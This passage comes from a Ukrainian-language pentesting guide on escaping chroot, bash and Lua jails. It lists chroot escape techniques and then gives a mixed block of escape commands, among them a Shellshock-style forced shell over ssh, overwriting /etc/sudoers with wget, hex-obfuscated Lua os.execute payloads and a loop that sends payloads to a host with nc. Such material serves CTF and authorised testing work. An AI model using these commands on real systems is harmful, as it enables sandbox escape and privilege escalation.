Escaping from Jails

</details>

### Root + Fork + UDS (Unix Domain Sockets)

<div data-gb-custom-block data-tag="hint" data-style='warning'>

FD може бути переданий через Unix Domain Sockets, тому:

* Створити дочірній процес (fork)
* Створити UDS, щоб батько і дитина могли спілкуватися
* Запустити chroot у дочірньому процесі в іншій папці
* У батьківському процесі створити FD папки, яка знаходиться поза новим chroot дочірнього процесу
* Передати цей FD дочірньому процесу за допомогою UDS
* Дочірній процес змінює поточну директорію на цей FD, і через те, що вона знаходиться поза його chroot, він вибереться з в'язниці

</div>

### Root + Mount

<div data-gb-custom-block data-tag="hint" data-style='warning'>

* Монтування кореневого пристрою (/) в каталог всередині chroot
* Chroot в цей каталог

Це можливо в Linux

</div>

### Root + /proc

<div data-gb-custom-block data-tag="hint" data-style='warning'>

* Монтування procfs в каталог всередині chroot (якщо ще не)
* Шукайте pid, у якого інший корінь/поточна директорія, наприклад: /proc/1/root
* Chroot в цей запис

</div>

### Root(?) + Fork

<div data-gb-custom-block data-tag="hint" data-style='warning'>

* Створити Fork (дочірній процес) і chroot в іншу папку глибше в FS та CD на неї
* З батьківського процесу перемістіть папку, де знаходиться дочірній процес, в папку перед chroot дітей
* Цей дочірній процес виявить себе поза chroot

</div>

### ptrace

<div data-gb-custom-block data-tag="hint" data-style='warning'>

* Колись користувачі могли налагоджувати власні процеси з процесу самого себе... але це більше не можливо за замовчуванням
* У будь-якому випадку, якщо це можливо, ви можете використовувати ptrace в процесі та виконати shellcode всередині нього ([див. цей приклад](linux-capabilities.md#cap\_sys\_ptrace)).

</div>

## Bash Jails

### Enumeration

Отримати інформацію про в'язницю:
```bash
echo $SHELL
echo $PATH
env
export
pwd

echo $PATH #See the path of the executables that you can use
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path
echo /home/* #List directory

:set shell=/bin/sh
:shell

red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path

ssh -t user@<IP> bash # Get directly an interactive shell
ssh user@<IP> -t "bash --noprofile -i"
ssh user@<IP> -t "() { :; }; sh -i "

declare -n PATH; export PATH=/bin;bash -i

BASH_CMDS[shell]=/bin/bash;shell -i

wget http://127.0.0.1:8080/sudoers -O /etc/sudoers

load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))()

print(string.char(0x41, 0x42))
print(rawget(string, "char")(0x41, 0x42))

for k,v in pairs(string) do print(k,v) end

#In this scenario you could BF the victim that is generating a new lua environment
#for every interaction with the following line and when you are lucky
#the char function is going to be executed
for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end

#This attack from a CTF can be used to try to chain the function execute from "os" library
#and "char" from string library, and the use both to execute a command
for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done

debug.debug()